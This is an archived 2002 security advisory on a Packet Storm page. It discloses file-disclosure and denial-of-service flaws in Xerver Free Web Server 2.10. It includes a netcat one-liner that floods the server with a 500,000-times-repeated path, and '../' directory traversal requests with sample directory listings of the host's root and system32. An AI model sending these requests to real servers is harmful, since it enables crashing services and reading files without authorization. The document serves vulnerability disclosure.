what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Xerver-2.10.txt

Xerver-2.10.txt
Posted Mar 8, 2002
Authored by Alex Hernandez

The Xerver Free Web Server v2.10 contains file disclosure and denial of service vulnerabilities. Platforms affected include Windows, Linux, BSD, Solaris, and Mac. Exploits included.

tags | exploit, web, denial of service, vulnerability
systems | linux, windows, solaris, bsd
SHA-256 | 38182b4e729c84958d0fc82d0597349a14e9eea6c1efb3b69df525ff368496eb

Xerver-2.10.txt

Change Mirror Download

------oOo------
Xerver Free Web Server 2.10 file Disclosure & DoS (Denial of Service Attack).
------oOo------

Company Affected: www.JavaScript.nu
Version: v2.10
Date Added: 02-27-02
Size: 287 KB
OS Affected: : Windows ALL, Linux ALL, BSD all, Solaris ALL, MAC ALL.

Author:

** Alex Hernandez <al3xhernandez@ureach.com>
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.

Also a greet to "KF" <dotslash@snosoft.com>
http://www.snosoft.com for invitme to participate for more
research about the Bugs, Exploits and Vulnerabilities :-)
thanks friend, u have publish exelents bugs :X

----=[Brief Description]=------------


Xerver Free Web Server is a tiny web server allowing you to run CGI/perl scripts on
your computer. Xerver includes features such as: Allow/forbid directory listing,
create your own error pages ("404 File Not Found"), allow/deny CGI-scripts, choose
your own index file extensions, share/unshare hidden files or files with certain
file extensions, share unlimited folders etc. Xerver is a tiny, fast and free web
server, but is still advanced and supports both HTTP/1.1 and HTTP/1.0 and all HTTP
methods (GET, POST and HEAD)."Run CGI/perl scripts on your computer.


----=[Summary]=----------------------

Exist two vulnerabilities:


The port 32123 usually is configuration of the server , exist a one metod for crass this
system calling the drive C:\ several times, another bug exists on server remote any
user can see all the files configuration on the system also even though one has formed
the services to deny the folders or files any user can access via remote to 80 port
finding the configuration of the own server.


------oOo------
Proof of concept


DoS

http://localhost:32123

$ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn 127.0.0.1 32123


Explotation:

Example 1:

$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0
HTTP/1.1 200 OK
Date: March 6, 2002 8:52:51 PM CST
Server: Xerver_v2
Connection: close
Location: /
Content-Type: text/html

<HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD><BODY BGCOLOR=white COL
OR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory Listing for /</H2></F
ONT><PRE>&nbsp;&nbsp;&nbsp;&nbsp;<B>File name File size&nb
sp;&nbsp;&nbsp;&nbsp;&nbsp;Last modified</B>


Program Files
--------------------------------------------------------------------------------
<A HREF="Program Files" STYLE="text-decoration: none;"><IMG SRC="/Image:showFold
er" BORDER=0> Program Files</A>
--------------------------------------------------------------------------------

RECYCLER
--------------------------------------------------------------------------------
<A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" B
ORDER=0> RECYCLER</A>
--------------------------------------------------------------------------------

WINNT
--------------------------------------------------------------------------------
<A HREF="WINNT" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" BORD
ER=0> WINNT</A>
-------------------------------------------------------------------------------

[...]

or via web:



http://localhost/unix/ALEX/Xerver2.10/../../../

Directory Listing for /

File name File size Last modified

$unix
ALEX
Documents and Settings
My Downloads
Program Files
RECYCLER

[...]


Example 2:

$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP 1.0

The results is:

Directory Listing for /WINNT/system32/


File name File size Last modified
../
AdCache
CatRoot
Com
DTCLog
DirectX
GroupPolicy
Hummbird
IOSUBSYS
Macromed
Microsoft

[...]


------oOo------------------------------------
Vendor Response:
The vendor was notified
"Omid Rouhani" webmaster@javascript.nu
htttp://www.JavaScript.nu
Patch Temporary: Restricted files and Directories

Alex Hernandez <al3xhernandez@ureach.com> (c) 2002.

------oOo------------------------------------








Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    35 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close